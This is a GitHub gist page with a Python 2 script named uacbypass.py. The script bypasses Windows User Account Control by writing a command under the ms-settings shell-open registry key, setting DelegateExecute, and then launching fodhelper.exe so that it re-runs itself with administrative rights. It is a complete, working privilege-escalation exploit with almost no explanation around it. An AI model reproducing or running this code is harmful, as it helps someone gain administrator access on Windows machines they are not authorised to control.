Skip to content

Instantly share code, notes, and snippets.

@tommelo

tommelo/uacbypass.py

Last active June 8, 2022 07:01
Show Gist options
  • Save tommelo/07dacce52664a35d2938a55d96bc8ac5 to your computer and use it in GitHub Desktop.
Save tommelo/07dacce52664a35d2938a55d96bc8ac5 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
uacbypass.py
import os
import sys
import ctypes
import _winreg
CMD = r"C:\Windows\System32\cmd.exe"
FOD_HELPER = r'C:\Windows\System32\fodhelper.exe'
PYTHON_CMD = "python"
REG_PATH = 'Software\Classes\ms-settings\shell\open\command'
DELEGATE_EXEC_REG_KEY = 'DelegateExecute'
def is_running_as_admin():
'''
Checks if the script is running with administrative privileges.
Returns True if is running as admin, False otherwise.
'''
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except:
return False
def create_reg_key(key, value):
'''
Creates a reg key
'''
try:
_winreg.CreateKey(_winreg.HKEY_CURRENT_USER, REG_PATH)
registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, REG_PATH, 0, _winreg.KEY_WRITE)
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
_winreg.CloseKey(registry_key)
except WindowsError:
raise
def bypass_uac(cmd):
'''
Tries to bypass the UAC
'''
try:
create_reg_key(DELEGATE_EXEC_REG_KEY, '')
create_reg_key(None, cmd)
except WindowsError:
raise
def execute():
if not is_running_as_admin():
print '[!] The script is NOT running with administrative privileges'
print '[+] Trying to bypass the UAC'
try:
current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + __file__
cmd = '{} /k {} {}'.format(CMD, PYTHON_CMD, current_dir)
bypass_uac(cmd)
os.system(FOD_HELPER)
sys.exit(0)
except WindowsError:
sys.exit(1)
else:
print '[+] The script is running with administrative privileges!'
if __name__ == '__main__':
execute()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment